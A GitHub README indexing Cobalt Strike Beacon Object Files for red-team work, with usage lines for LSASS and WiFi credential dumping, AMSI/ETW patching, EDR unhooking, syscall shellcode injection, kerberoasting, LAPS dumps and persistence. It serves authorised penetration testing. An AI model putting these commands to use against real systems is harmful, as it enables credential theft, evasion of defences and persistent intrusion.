Skip to content

Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.

Notifications You must be signed in to change notification settings

hrtywhy/BOF-CobaltStrike

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

CobaltStrike BOF Collections

Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.


Enumeration

arp --> List arp tables
ipconfig --> Run ipconfig
ldapsearch [query]
listdns --> Pulls DNS cache
netuser [username] [opt: domain] --> Get info on user account
nslookup [hostname] --> Perform DNS query
tasklist --> Get local running processes
  • Find Objects BOF
    Use direct system calls to enumerate processes for specific loaded modules (amsi.dll, clr.dll) or process handles (lsass.exe)
    Avoids fork&run
FindModule amsi.dll
FindProcHandle lsass.exe
  • BOF Collection
    A set of BOFs useful for enumeration and exploitation. Examples include:
inline-execute GetDomainInfo.o --> Get domain info from DC

inline-execute GetClipboard.o --> Prints any text on the user's clipboard

enumwifi --> Enumerate wifi connections
dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials

bofportscan 192.168.1.10 3389 --> Port scanner

inline-execute RegistryPersistence.o Install --> Install registry persistence
inline-execute RegistryPersistence.o Remove --> Remove registry persistence
  • whereami
    A "Where Am I" BOF which is a way to run the whoami.exe binary but in an opsec safe way by pulling the info from the current beacon process memory.
    Also pulls current environment variables.
    whereami

  • RiccardoAncarani BOFs
    A useful BOF collection to perform various tasks in a safer opsec way.

send_shellcode_via_pipe <pipe> <file> --> Send shellcode or any byte via a named pipe
cat <file> --> Read file, supports remote shares
wts_enum_remote_processes <host> --> Enumerate remote processes using WTS APIs
unhook <module>, unhook ntdll.dll --> Use direct syscalls to unhook APIs of a specific DLL (works only on 64-bit beacons)
  • Outflank C2 Tool Collection
    Great list of useful tools converted to BOFs for better opsec.
    Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more!
AddMachineAccount [*Computername] [Optional Password] --> Create new machine account - requires MachineAccountQuota to create new account
Domaininfo --> Enumerate AD domain
Lapsdump <computername> --> Dump LAPS passwowrds on remote systems within AD (requires elevated privileges on target)
Smbinfo <compuername> --> Get SMB info of remote system
Winver --> Shows the version of Windows that is running on the local system

Executing .NET Assemblies

  • InlineExecute-Assembly
    Perform .NET assembly execution of any .NET executable without any prior modifications required
    The BOF also supports several flags to disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, or customization of the CLR App Domain name to be created
    inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot

  • inject-assembly
    Another alternative .NET executable loader to inject an assembly into a running process
    inject-assembly 0 /home/Rubeus.exe [args...]


Exploitation

  • ajpc500 BOFs
    A collection of very useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
etw stop --> Patch etw
syscalls_inject <PID> <listener_name> / syscalls_shinject <PID> <path_to_bin> --> Syscalls shellcode injection
syscalls_spawn <listener> / syscalls_shspawn <path_to_bin> --> Spawn and syscalls injections
static_syscalls_apc_spawn <listener> / static_syscalls_apc_spawn <path_to_bin> --> Spawn and static syscalls shellcode njection (NtQueueApcThread)
static_syscalls_inject <PID> <listener_name> / static_syscalls_shinject <PID> <path_to_bin> --> Static syscalls shellcode injection (NtCreateThreadEx)
static_syscalls_dump <PID> [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!)
  • MiniDumpWriteDump
    Uses static syscalls to dump a process such as LSASS to output file
    minidumpwritedump <PID> <path_of_dmp?>

  • SilentLsassDump
    Uses direct syscalls generated from https://github.com/outflanknl/InlineWhispers
    Dump the LSASS process via the silent process exit mechanism into the C:\Temp directory
    silentLsassDump <LSASS PID>

  • Unhook BOF
    Created by Raphael Mudge, this BOF will attempt to unhook userland APIs to bypass EDR
    Sort of the "hail mary" for attempting to unhook APIs
    unhook

  • WdToggle
    Enables WDigest credential caching using direct system calls
    Bypasses Windows Credential Guard if enabled

inline-execute WdToggle.o --> First enable WdDigest caching
logonpasswords --> Second, wait for users to login and then run Mimikatz to dump their newly cached cleartext passwords
  • TrustedSec CS-Remote-OPs-BOF
    Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
    Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more!
adcs_request --> Request an enrollment certificate
procdump --> Dump specified process to output file
reg_set --> Set/create a registry key
sc_create --> Create a new service
schtaskscreate --> Create a new scheduled task
setuserpass --> Set a users password
  • Inject AMSI Bypass
    BOF that bypasses AMSI in a remote process with code injection
    inject-amsiBypass <PID>

  • Inject ETW Bypass
    Inject ETW Bypass into Remote Process via Syscalls
    injectEtwBypass <PID>

  • Kerberoast BOF
    BOF for targeted Kerberoasting against input SPN to roast
    Returns TGS that you can pass to apreq2hashcat.py (provided in repo) to output the hashcat format
    kerberoast SPN/HOSTNAME.domain.local


Miscellaneous

  • BOF Template
    Used for creating your very own BOFs!

  • BOF Hound
    An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's "ldapsearch".
    Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
    bofhound -o /data/

  • Help Color
    Color helper Aggressor script for coloring "help" output based on command type and OPSEC
    helpx

About

Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published